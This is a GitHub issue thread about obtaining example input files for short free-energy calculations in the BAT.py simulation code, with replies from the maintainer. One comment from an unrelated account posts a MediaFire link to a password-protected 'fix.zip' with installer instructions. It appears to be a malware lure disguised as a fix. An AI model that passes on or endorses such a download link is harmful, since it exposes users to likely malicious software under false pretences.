### ISSUE TITLE
Need some example input files for tevb or m*evbc

### ISSUE THREAD

**Issue by ErikZhang-9762** [GHeinzelmann/BAT.py#39]
Hi，

I read the BAT2 article on JCTC and the section 4.2 on reducing simulation time was interesting.

I'm not clear how to set short `tevb` calculation or short `m*evbc` calculation

Can you provide some example input files for this?

Thanks,
Eric

**Comment by GHeinzelmann** [comment]
Hi and thanks for your intereest in the BAT code. The input files for these calculations are provided in the paper SI, with a README explaining how to use them.

**Comment by GHeinzelmann** [comment]
I just noticed that they were not included in the final version of the paper, and I am taking care of that already. Here you can find them in the pre-print:

https://chemrxiv.org/engage/chemrxiv/article-details/65d60b5a66c13817292b07ae

It is the Input Files file that contains all the needed files to reproduce the paper results.

**Comment by GHeinzelmann** [comment]
Hi and thanks for your interest in the BAT code. The input files for these calculations were to be provided in the JCTC paper SI, with a README explaining how to use them, but they are not there. Thanks for bringing that to my attention :)

Until I fix that, these input files can be found in the Computational Cost section of the main page.

**Comment by ErikZhang-9762** [comment]
Thanks for the timely reply, I will try it.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GHeinzelmann** [comment]
Issue solved.
